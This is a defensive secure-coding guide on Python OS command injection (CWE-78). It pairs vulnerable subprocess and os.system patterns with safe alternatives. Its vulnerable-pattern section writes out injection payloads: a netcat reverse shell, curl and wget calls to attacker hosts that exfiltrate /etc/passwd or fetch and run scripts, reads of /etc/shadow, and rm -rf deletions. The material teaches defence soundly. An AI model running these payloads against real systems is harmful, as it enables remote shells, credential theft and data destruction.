CWE-78: OS Command Injection - Python

Overview

OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.

Primary Defence: Use Python native libraries (pathlib, requests, etc.) instead of system commands, or if unavoidable, use subprocess.run() with argument lists and shell=False (never shell=True).

Remediation Strategy

PRIMARY FIX - Avoid System Calls

Use Python native libraries instead of executing commands

This eliminates the vulnerability entirely
Do NOT use subprocess or os.system() if a Python library exists

SECONDARY FIX - Use subprocess.run() with Argument List

Set shell=False, pass arguments as list

WARNING: Only use if Priority 1 is not possible
Must use list of arguments with shell=False (CRITICAL)

Defense in Depth - Input Validation

Allowlist permitted characters

Required in addition to Priority 1 or 2
Never use validation alone

Additional Hardening - Least Privilege

Drop privileges, use resource limits

Apply alongside other fixes

Decision Tree

Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, requests, etc.)
│  ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│  └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│  ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│  └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
   ├─ Add input validation (Priority 3)
   └─ Apply least privilege (Priority 4)

Common Vulnerable Patterns

String Concatenation with os.system()

# VULNERABLE - Command injection via string concatenation

filename = request.GET['file']
os.system('ls -la ' + filename)

# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp

Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.

Using subprocess with shell=True

# VULNERABLE - Shell command injection

user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)

# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file

subprocess.Popen with Shell Invocation

# VULNERABLE - Invoking shell allows command injection

ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)

# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands

Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.

Unvalidated Input in subprocess.call()

# VULNERABLE - No input validation with shell=True

user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)

# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; python /tmp/m.sh"
# Result: Downloads and executes malware

Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.

Secure Patterns

Use Python Native Libraries (PREFERRED - Eliminates Command Injection)

# SECURE - Use pathlib and os modules instead of OS commands

from pathlib import Path
import os

directory = Path('/uploads')
for file_path in directory.iterdir():
    stat = file_path.stat()
    print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")

# More file operations

import shutil
content = Path(filepath).read_text()           # Instead of "cat"
shutil.copy(source, dest)                      # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True)  # Instead of "mkdir -p"
Path(filepath).unlink()                        # Instead of "rm"

Why this works: Python's pathlib and shutil modules operate directly on the filesystem through the Python runtime without invoking shell commands. This completely eliminates command injection vulnerabilities - there's no OS process to execute, no shell to interpret metacharacters like ;, |, or &&, and no possibility of command chaining. These functions are also more portable across operating systems than system commands.

Use requests Library for Network Operations

# SECURE - Use requests instead of wget/curl commands

import requests

response = requests.get(url, timeout=30)
content = response.content

# For downloads

with requests.get(url, stream=True, timeout=30) as r:
    r.raise_for_status()
    with open('download.file', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)

Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.

Use tarfile/zipfile for Archives

# SECURE - Use tarfile module instead of tar commands

import tarfile
from pathlib import Path

with tarfile.open(archive, 'r:gz') as tar:
    # Safe extraction with path validation
    for member in tar.getmembers():
        # Prevent path traversal
        if member.name.startswith('/') or '..' in member.name:
            raise ValueError(f'Unsafe archive member: {member.name}')
        tar.extract(member, path='./extracted')

# For ZIP files

import zipfile
with zipfile.ZipFile(archive, 'r') as zip_ref:
    for member in zip_ref.namelist():
        if member.startswith('/') or '..' in member:
            raise ValueError(f'Unsafe archive member: {member}')
    zip_ref.extractall('./extracted')

Why this works: Python's tarfile and zipfile modules handle archive operations in pure Python without calling external tar, unzip, or 7z commands. Even if an attacker controls filenames within the archive, they cannot inject shell commands because no shell is invoked. The path traversal validation (checking for .. and absolute paths) prevents zip slip attacks, providing defense-in-depth.

Use re Module for Text Processing

# SECURE - Use re module instead of grep commands

import re
from pathlib import Path

content = Path(filepath).read_text()
matches = re.findall(pattern, content)

# Line-by-line processing

with open(filepath) as f:
    matching_lines = [line for line in f if search_term in line]

Why this works: Python's re module and file I/O operations provide powerful text processing capabilities without executing grep, sed, awk, or other shell utilities. Processing text in-memory through Python prevents command injection while offering better performance, type safety, and cross-platform compatibility. List comprehensions and regex operations are also more maintainable than complex shell pipelines.

subprocess.run() with Argument List (If Process Execution Required)

WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.

# USE WITH CAUTION - When process execution is unavoidable, use argument list

import subprocess
import re

ip_address = request.GET['ip']

# Validate input first
if not re.match(r'^(\d{1,3}\.){3}\d{1,3}$', ip_address):
    raise ValueError('Invalid IP address')

# Use list of arguments - NO SHELL
result = subprocess.run(
    ['ping', '-c', '4', ip_address],  # Arguments as list
    capture_output=True,
    text=True,
    shell=False,  # CRITICAL: shell=False
    timeout=10
)

print(result.stdout)

Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without shell interpretation. Even if ip_address contains shell metacharacters like ; or &&, they're treated as literal argument data rather than command separators. The shell=False setting is critical - it prevents Python from invoking /bin/sh or cmd.exe, eliminating the shell layer entirely. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess.

subprocess.run() with Path Validation (For File Operations)

WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).

For file operations requiring subprocess - always validate paths.

# AVOID IF POSSIBLE - Validate paths before use

filename = request.GET['file']

# Validate filename
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
    raise ValueError('Invalid filename')

# Better: Use pathlib instead of subprocess
file_path = Path('/uploads') / filename
if not file_path.resolve().is_relative_to('/uploads'):
    raise ValueError('Path traversal detected')

content = file_path.read_text()

Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.

Input Validation (Defense in Depth)

Allowlist Validation

import re

def validate_filename(filename):
    """Only allow alphanumeric, underscore, dash, dot"""
    if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
        raise ValueError('Invalid filename characters')
    return filename

def validate_ip_address(ip):
    """Validate IPv4 format"""
    import ipaddress
    try:
        ipaddress.IPv4Address(ip)
        return ip
    except ValueError:
        raise ValueError('Invalid IP address')

Django/Flask Integration

# Django view with validation

from django.core.validators import RegexValidator
from django.core.exceptions import ValidationError

ip_validator = RegexValidator(
    regex=r'^(\d{1,3}\.){3}\d{1,3}$',
    message='Invalid IP address'
)

def ping_view(request):
    ip_address = request.GET.get('ip', '')

    try:
        ip_validator(ip_address)
    except ValidationError:
        return HttpResponseBadRequest('Invalid IP')

    # Safe to use with subprocess
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False
    )
    return HttpResponse(result.stdout)

shlex for Argument Parsing (Use Carefully)

import shlex
import subprocess

# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template

cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip)  # Append validated user input
subprocess.run(args, shell=False)

# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input)  # Still vulnerable!
# subprocess.run(args, shell=False)

Security Best Practices

Use Timeout

try:
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging
    )
except subprocess.TimeoutExpired:
    # Handle timeout
    pass

Limit Resource Usage

import resource

def limit_process_resources():
    """Limit CPU and memory for subprocess"""
    def set_limits():
        # Limit CPU time to 30 seconds
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
        # Limit memory to 128MB
        resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024, 
                                                  128 * 1024 * 1024))

    return set_limits

# Use preexec_fn (Unix only)

subprocess.run(
    ['ping', '-c', '4', ip_address],
    preexec_fn=limit_process_resources(),
    shell=False
)

Drop Privileges (Unix)

import os
import pwd

def drop_privileges(username='nobody'):
    """Drop privileges to specified user"""
    def set_user():
        pw_record = pwd.getpwnam(username)
        os.setgid(pw_record.pw_gid)
        os.setuid(pw_record.pw_uid)
    return set_user

# Run subprocess as unprivileged user

subprocess.run(
    ['command'],
    preexec_fn=drop_privileges('nobody'),
    shell=False
)

Verification

After implementing the recommended secure patterns, verify the fix through multiple approaches:

Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced

Deprecated/Dangerous Functions to Avoid

# NEVER USE THESE:

os.system(cmd)              # Always uses shell
os.popen(cmd)               # Deprecated, uses shell
commands.getoutput(cmd)     # Removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)

# ALWAYS USE:

subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)

Additional Resources

Bandit Security Linter - Detects subprocess issues
CWE-78 Definition
OWASP Command Injection
Python Requests Library
Python pathlib Module
Python shutil Module
Python subprocess Documentation
Python tarfile Module
Python zipfile Module